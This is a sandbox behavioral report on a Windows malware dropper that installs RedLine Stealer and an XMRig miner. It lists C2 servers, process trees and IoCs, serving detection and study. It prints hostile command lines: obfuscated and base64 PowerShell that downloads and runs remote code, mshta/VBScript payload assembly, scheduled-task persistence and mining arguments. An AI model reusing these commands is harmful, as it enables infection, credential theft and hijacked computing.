Analysis
-
max time kernel
151s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
29-09-2021 12:02
Static task
static1
Behavioral task
behavioral1
Sample
a94fe2d4ea938aeda1b547621f8127b4.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
a94fe2d4ea938aeda1b547621f8127b4.exe
Resource
win10v20210408
General
-
Target
a94fe2d4ea938aeda1b547621f8127b4.exe
-
Size
8KB
-
MD5
a94fe2d4ea938aeda1b547621f8127b4
-
SHA1
1e5872c1fdd4bed72e7745891ccc0f29f1ae4963
-
SHA256
51d754d17bded4a65f90a483bf8aeb78fdcbb421ccbcd5391eeb777e4ffc4d7d
-
SHA512
0f47cb66612dda4814c9806825ea3248460664c1b9e77190abf1945f6df31458824d7ff2a324e95d0e84f4f819e878dbc1a0ce41b51dc8ab3cdf0c49fc0b7c7b
Malware Config
Extracted
http://shellloader.top/welcome
Extracted
redline
UTS
45.9.20.20:13441
Extracted
redline
oliver2109
213.166.69.181:64650
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3732-190-0x0000000002DC0000-0x0000000002DDF000-memory.dmp family_redline behavioral2/memory/3732-193-0x00000000049B0000-0x00000000049CE000-memory.dmp family_redline behavioral2/memory/3752-225-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/3752-226-0x000000000041C5F2-mapping.dmp family_redline behavioral2/memory/3752-242-0x00000000056C0000-0x0000000005CC6000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4308 created 1248 4308 WerFault.exe setup.exe -
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4492-445-0x00000001402F327C-mapping.dmp xmrig behavioral2/memory/4492-447-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 34 4156 powershell.exe 37 4892 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 21 IoCs
Processes:
LzmwAqmV.exeChrome7.exePublicDwlBrowser1100.exesetup.exeudptest.exesfx_123_206.exeoliver2109-c.exesetup_2.exe6262677.exesetup_2.tmpliy-game.exejhuuee.exesetup_2.exesetup_2.tmpoliver2109-c.exepostback.exe4MCYlgNAW.eXEoliver2109-c.exeecQNBx1xm.exeservices64.exesihost64.exepid process 2156 LzmwAqmV.exe 856 Chrome7.exe 1044 PublicDwlBrowser1100.exe 1248 setup.exe 3732 udptest.exe 1824 sfx_123_206.exe 1648 oliver2109-c.exe 2480 setup_2.exe 3032 6262677.exe 2928 setup_2.tmp 4052 liy-game.exe 3916 jhuuee.exe 1004 setup_2.exe 2836 setup_2.tmp 1512 oliver2109-c.exe 4084 postback.exe 1864 4MCYlgNAW.eXE 3752 oliver2109-c.exe 5028 ecQNBx1xm.exe 1608 services64.exe 4536 sihost64.exe -
Loads dropped DLL 5 IoCs
Processes:
setup_2.tmpsetup_2.tmprundll32.exerundll32.exepid process 2928 setup_2.tmp 2836 setup_2.tmp 4716 rundll32.exe 4988 rundll32.exe 4988 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
ecQNBx1xm.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" ecQNBx1xm.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce ecQNBx1xm.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
postback.exeoliver2109-c.exeservices64.exedescription pid process target process PID 4084 set thread context of 4384 4084 postback.exe explorer.exe PID 1648 set thread context of 3752 1648 oliver2109-c.exe oliver2109-c.exe PID 1608 set thread context of 4492 1608 services64.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
setup_2.tmpdescription ioc process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-NCPCP.tmp setup_2.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 652 1248 WerFault.exe setup.exe 3912 1248 WerFault.exe setup.exe 2256 1248 WerFault.exe setup.exe 4148 1248 WerFault.exe setup.exe 4264 1248 WerFault.exe setup.exe 4308 1248 WerFault.exe setup.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4980 schtasks.exe 3836 schtasks.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3008 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6262677.exeWerFault.exesetup_2.tmpWerFault.exeWerFault.exeWerFault.exepid process 3032 6262677.exe 3032 6262677.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 2836 setup_2.tmp 2836 setup_2.tmp 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 3912 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 2256 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe 4148 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
Processes:
a94fe2d4ea938aeda1b547621f8127b4.exePublicDwlBrowser1100.exe6262677.exeWerFault.exeWerFault.exeWerFault.exetaskkill.exeWerFault.exeWerFault.exeWerFault.exepostback.exeudptest.exepowershell.exepowershell.exeChrome7.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 776 a94fe2d4ea938aeda1b547621f8127b4.exe Token: SeDebugPrivilege 1044 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 3032 6262677.exe Token: SeRestorePrivilege 652 WerFault.exe Token: SeBackupPrivilege 652 WerFault.exe Token: SeDebugPrivilege 652 WerFault.exe Token: SeDebugPrivilege 3912 WerFault.exe Token: SeDebugPrivilege 2256 WerFault.exe Token: SeDebugPrivilege 3008 taskkill.exe Token: SeDebugPrivilege 4148 WerFault.exe Token: SeDebugPrivilege 4264 WerFault.exe Token: SeDebugPrivilege 4308 WerFault.exe Token: SeDebugPrivilege 4084 postback.exe Token: SeDebugPrivilege 3732 udptest.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 856 Chrome7.exe Token: SeDebugPrivilege 1608 services64.exe Token: SeLockMemoryPrivilege 4492 explorer.exe Token: SeLockMemoryPrivilege 4492 explorer.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
setup_2.tmppid process 2836 setup_2.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a94fe2d4ea938aeda1b547621f8127b4.exeLzmwAqmV.exePublicDwlBrowser1100.exesetup_2.exesetup_2.tmpsfx_123_206.exesetup_2.exeoliver2109-c.exemshta.exesetup_2.tmpcmd.exe4MCYlgNAW.eXEmshta.exedescription pid process target process PID 776 wrote to memory of 2156 776 a94fe2d4ea938aeda1b547621f8127b4.exe LzmwAqmV.exe PID 776 wrote to memory of 2156 776 a94fe2d4ea938aeda1b547621f8127b4.exe LzmwAqmV.exe PID 776 wrote to memory of 2156 776 a94fe2d4ea938aeda1b547621f8127b4.exe LzmwAqmV.exe PID 2156 wrote to memory of 856 2156 LzmwAqmV.exe Chrome7.exe PID 2156 wrote to memory of 856 2156 LzmwAqmV.exe Chrome7.exe PID 2156 wrote to memory of 1044 2156 LzmwAqmV.exe PublicDwlBrowser1100.exe PID 2156 wrote to memory of 1044 2156 LzmwAqmV.exe PublicDwlBrowser1100.exe PID 2156 wrote to memory of 1248 2156 LzmwAqmV.exe setup.exe PID 2156 wrote to memory of 1248 2156 LzmwAqmV.exe setup.exe PID 2156 wrote to memory of 1248 2156 LzmwAqmV.exe setup.exe PID 2156 wrote to memory of 3732 2156 LzmwAqmV.exe udptest.exe PID 2156 wrote to memory of 3732 2156 LzmwAqmV.exe udptest.exe PID 2156 wrote to memory of 3732 2156 LzmwAqmV.exe udptest.exe PID 2156 wrote to memory of 1824 2156 LzmwAqmV.exe sfx_123_206.exe PID 2156 wrote to memory of 1824 2156 LzmwAqmV.exe sfx_123_206.exe PID 2156 wrote to memory of 1824 2156 LzmwAqmV.exe sfx_123_206.exe PID 2156 wrote to memory of 1648 2156 LzmwAqmV.exe oliver2109-c.exe PID 2156 wrote to memory of 1648 2156 LzmwAqmV.exe oliver2109-c.exe PID 2156 wrote to memory of 1648 2156 LzmwAqmV.exe oliver2109-c.exe PID 2156 wrote to memory of 2480 2156 LzmwAqmV.exe setup_2.exe PID 2156 wrote to memory of 2480 2156 LzmwAqmV.exe setup_2.exe PID 2156 wrote to memory of 2480 2156 LzmwAqmV.exe setup_2.exe PID 1044 wrote to memory of 3032 1044 PublicDwlBrowser1100.exe 6262677.exe PID 1044 wrote to memory of 3032 1044 PublicDwlBrowser1100.exe 6262677.exe PID 1044 wrote to memory of 3032 1044 PublicDwlBrowser1100.exe 6262677.exe PID 2480 wrote to memory of 2928 2480 setup_2.exe setup_2.tmp PID 2480 wrote to memory of 2928 2480 setup_2.exe setup_2.tmp PID 2480 wrote to memory of 2928 2480 setup_2.exe setup_2.tmp PID 2156 wrote to memory of 4052 2156 LzmwAqmV.exe liy-game.exe PID 2156 wrote to memory of 4052 2156 LzmwAqmV.exe liy-game.exe PID 2156 wrote to memory of 4052 2156 LzmwAqmV.exe liy-game.exe PID 2156 wrote to memory of 3916 2156 LzmwAqmV.exe jhuuee.exe PID 2156 wrote to memory of 3916 2156 LzmwAqmV.exe jhuuee.exe PID 2928 wrote to memory of 1004 2928 setup_2.tmp setup_2.exe PID 2928 wrote to memory of 1004 2928 setup_2.tmp setup_2.exe PID 2928 wrote to memory of 1004 2928 setup_2.tmp setup_2.exe PID 1824 wrote to memory of 1328 1824 sfx_123_206.exe mshta.exe PID 1824 wrote to memory of 1328 1824 sfx_123_206.exe mshta.exe PID 1824 wrote to memory of 1328 1824 sfx_123_206.exe mshta.exe PID 1004 wrote to memory of 2836 1004 setup_2.exe setup_2.tmp PID 1004 wrote to memory of 2836 1004 setup_2.exe setup_2.tmp PID 1004 wrote to memory of 2836 1004 setup_2.exe setup_2.tmp PID 1648 wrote to memory of 1512 1648 oliver2109-c.exe oliver2109-c.exe PID 1648 wrote to memory of 1512 1648 oliver2109-c.exe oliver2109-c.exe PID 1648 wrote to memory of 1512 1648 oliver2109-c.exe oliver2109-c.exe PID 1328 wrote to memory of 616 1328 mshta.exe cmd.exe PID 1328 wrote to memory of 616 1328 mshta.exe cmd.exe PID 1328 wrote to memory of 616 1328 mshta.exe cmd.exe PID 1648 wrote to memory of 3752 1648 oliver2109-c.exe oliver2109-c.exe PID 1648 wrote to memory of 3752 1648 oliver2109-c.exe oliver2109-c.exe PID 1648 wrote to memory of 3752 1648 oliver2109-c.exe oliver2109-c.exe PID 2836 wrote to memory of 4084 2836 setup_2.tmp postback.exe PID 2836 wrote to memory of 4084 2836 setup_2.tmp postback.exe PID 2836 wrote to memory of 4084 2836 setup_2.tmp postback.exe PID 616 wrote to memory of 1864 616 cmd.exe 4MCYlgNAW.eXE PID 616 wrote to memory of 1864 616 cmd.exe 4MCYlgNAW.eXE PID 616 wrote to memory of 1864 616 cmd.exe 4MCYlgNAW.eXE PID 616 wrote to memory of 3008 616 cmd.exe taskkill.exe PID 616 wrote to memory of 3008 616 cmd.exe taskkill.exe PID 616 wrote to memory of 3008 616 cmd.exe taskkill.exe PID 1864 wrote to memory of 4124 1864 4MCYlgNAW.eXE mshta.exe PID 1864 wrote to memory of 4124 1864 4MCYlgNAW.eXE mshta.exe PID 1864 wrote to memory of 4124 1864 4MCYlgNAW.eXE mshta.exe PID 4124 wrote to memory of 4236 4124 mshta.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a94fe2d4ea938aeda1b547621f8127b4.exe"C:\Users\Admin\AppData\Local\Temp\a94fe2d4ea938aeda1b547621f8127b4.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Chrome7.exe"C:\Users\Admin\AppData\Local\Temp\Chrome7.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\services64.exe"C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=40 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\6262677.exe"C:\ProgramData\6262677.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 8044⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 8244⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 8964⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 10004⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 10884⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 11244⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"9⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G10⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\oliver2109-c.exe"C:\Users\Admin\AppData\Local\Temp\oliver2109-c.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\oliver2109-c.exeC:\Users\Admin\AppData\Local\Temp\oliver2109-c.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\oliver2109-c.exeC:\Users\Admin\AppData\Local\Temp\oliver2109-c.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-VFV4E.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-VFV4E.tmp\setup_2.tmp" /SL5="$301DE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-9FMN9.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9FMN9.tmp\setup_2.tmp" /SL5="$70068,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-7ACET.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-7ACET.tmp\postback.exe" ss17⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss18⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"10⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\ecQNBx1xm.exe"C:\Users\Admin\AppData\Local\Temp\ecQNBx1xm.exe"9⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SYSTEM32\cmd.execmd /c "helimlim.bat"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA11⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs12⤵
-
C:\Users\Admin\AppData\Local\Temp\liy-game.exe"C:\Users\Admin\AppData\Local\Temp\liy-game.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\6262677.exeMD5
47d92c5c41e3654309af385fb5922e20
SHA176ad0f81e28d65c33b415b6f8964cdbeaf7dd700
SHA2563a86361ecfdac51da6c18c2f6ff292f676dc40baffcd12757b1915dbbdc41740
SHA51262b0882bbdcfee709817f54fc34a4cbc5502970b2d49d22c46e328527292ace4c854a378ae11165bb709df828ba6764f20ad7f4df90fdc0825ae0d2269b55a54
-
C:\ProgramData\6262677.exeMD5
47d92c5c41e3654309af385fb5922e20
SHA176ad0f81e28d65c33b415b6f8964cdbeaf7dd700
SHA2563a86361ecfdac51da6c18c2f6ff292f676dc40baffcd12757b1915dbbdc41740
SHA51262b0882bbdcfee709817f54fc34a4cbc5502970b2d49d22c46e328527292ace4c854a378ae11165bb709df828ba6764f20ad7f4df90fdc0825ae0d2269b55a54
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oliver2109-c.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
509cf9eefa0d011823975236fb5b4cb1
SHA17b1c0527e7787aa8d98cb6d8ac834559946c3ff7
SHA2565dc41141f18d34999d7cecbbe78e7de9450a1f8f1740913fe298ed289d8ab5f7
SHA512ef49e6f23a1f899facbca776db5045bf5ee5c68d9ae6b5d6e65ed3904acac68801aba411c42e6ec67632a4e18488f801a61582660d7892d595544d05d54b81ef
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXEMD5
f39dd2806d71830979a3110eb9a0ae44
SHA1fd94b99664d85eede48ab22f27054ab5cc6dd2d3
SHA256c5763dba038b94970b85fd0a078bcb1977e3973c56780e76b443915a9c30e213
SHA512ffc5a57fa4982a425e1bb2077affba0113d92365ad6eae849e9d700ee99615128c965de3705d2f2a12c1b46230ef2fc1820e4b74b8a3938b1b7211a228db9e82
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXEMD5
f39dd2806d71830979a3110eb9a0ae44
